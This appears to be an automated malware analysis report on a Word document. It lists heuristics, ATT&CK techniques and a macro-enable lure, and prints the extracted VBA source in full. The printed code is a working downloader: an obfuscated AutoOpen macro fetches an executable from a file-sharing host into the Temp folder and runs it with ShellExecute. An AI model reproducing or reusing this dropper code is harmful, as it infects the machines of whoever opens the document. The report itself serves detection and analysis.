MALICIOUS
238
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1071.001 Web Protocols
T1105 Ingress Tool Transfer
The sample contains VBA macros that leverage the URLDownloadToFile API, indicating an intent to download and execute a second-stage payload. The 'Enable Macros to view full content' lure is a common technique to bypass security measures. The presence of AutoOpen and ShellExecute API references further supports the malicious nature of the document.
Heuristics 9
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function OSILlzCwXBSr Lib "urlmon" Alias "URLDownloadToFileA" _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
JkFjuexVzhTjcr = Environ("Te" & "mp") -
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4702 bytes |
SHA-256: c1b51a441ba10041621879bc41698edaf8915bd63943f6d81c2fb9cb42b137ae |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
#If VBA7 Then
Private Declare PtrSafe Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Private Declare PtrSafe Function OSILlzCwXBSr Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal JQ1Vb72t6bIXtK As Long, ByVal JRzHJklNNL94gD As String, ByVal J8hIi9FwLiiVlr As String, ByVal Jznz68mkaaJQQS As Long, ByVal JxJfdLyE4jCnl5 As Long) As Long
Private Declare PtrSafe Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" ( _
ByVal lpBuffer As String, _
nSize As Long) As Long
Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare PtrSafe Function FindWindow Lib "user32" _
Alias "FindWindowA" _
(ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare PtrSafe Function GetClassName Lib "user32" _
Alias "GetClassNameA" _
(ByVal hWnd As Long, _
ByVal lpClassName As String, _
ByVal nMaxCount As Long) As Long
#Else
Public Declare Function GetDriveType Lib "kernel32" _
Alias "GetDriveTypeA" (ByVal nDrive As String) As Integer
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Private Declare Function OSILlzCwXBSr Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal JJJWuPD4NeO4WF As Long, ByVal JYURvmkth8tnbT As String, ByVal JaRjJOa6JYniCR As String, ByVal JZKNefyicowIGO As Long, ByVal JNydFEvaD5IuXm As Long) As Long
Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" ( _
ByVal lpBuffer As String, _
nSize As Long) As Long
Private Declare Function FindWindow Lib "user32" _
Alias "FindWindowA" _
(ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function GetClassName Lib "user32" _
Alias "GetClassNameA" _
(ByVal hWnd As Long, _
ByVal lpClassName As String, _
ByVal nMaxCount As Long) As Long
#End If
Sub apiuse1()
Dim lresult As Long
Dim sBuffer As String
Dim lSize As Long
lSize = 256
sBuffer = Space(lSize)
lresult = GetComputerName(sBuffer, nSize)
If lresult <> 0 Then
sBuffer = Left$(sBuffer, nSize)
Else
End If
End Sub
Sub AutoOpen()
Dim sBuffer As String
Dim nSize As Long
Dim http As String: http = "htt" & "p://"
Dim lresult As Long
JRYfcuLs5uEk2Z = http & "ge.tt/api/1/files/67jsb5E2/0/blob?download"
nSize = 2048
JkFjuexVzhTjcr = Environ("Te" & "mp")
JBIWUgHTF3bla = JRYfcuLs5uEk2Z
sBuffer = Space(248)
lresult = GetComputerName(sBuffer, nSize)
JIgLb2TdFZHCB = JkFjuexVzhTjcr & "\" & "JTf1LX5cOyJQ7i" & ".exe"
usedownapi JBIWUgHTF3bla, JIgLb2TdFZHCB
End Sub
Sub usedownapi(ByVal JBIWUgHTF3bzla As String, ByVal JIgLb2TdFZHCaB As String)
OSILlzCwXBSr 0, JBIWUgHTF3bzla, JIgLb2TdFZHCaB, 0, 0
userunapi JIgLb2TdFZHCaB
End Sub
Public Sub GetClassNameFromTitle()
Dim sInput As String
Dim hWnd As Long
Dim lpClassName As String
Dim nMaxCount As Long
Dim lresult As Long
' pad the return buffer for GetClassName
nMaxCount = 256
lpClassName = Space(nMaxCount)
' Note: must be an exact match
sInput = InputBox("Enter the exact window title:")
' No validation is done as this is a debug window utility
hWnd = FindWindow(vbNullString, sInput)
' Get the class name of the window, again, no validation
lresult = GetClassName(hWnd, lpClassName, nMaxCount)
Debug.Print "Window: " & sInput
Debug.Print "Class name: " & Left$(lpClassName, lresult)
End Sub
Sub userunapi(ByVal JBIWUgHTF3bzla As String)
ShellExecute 0, "open", JBIWUgHTF3bzla, "", vbNullString, vbNormalFocus
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.